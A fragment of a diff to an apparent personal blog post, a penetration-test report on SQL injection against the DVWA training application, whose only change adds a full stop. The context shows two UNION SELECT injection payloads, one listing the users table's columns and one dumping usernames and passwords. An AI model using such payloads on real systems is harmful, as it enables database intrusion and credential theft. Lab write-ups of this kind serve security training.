Kwangyun/Kwangyun.github.io/_posts/2023-06-30-SQLI-RCE-Report.md

 ```{bash}
 ' UNION SELECT null, column_name FROM information_schema.columns WHERE table_schema = 'dvwa' AND table_name = 'users' #
 ```
-As a result, the tester retrieved the username and password from the data base
+As a result, the tester retrieved the username and password from the data base.

 ```{bash}
 ' UNION SELECT user, password FROM dvwa.users #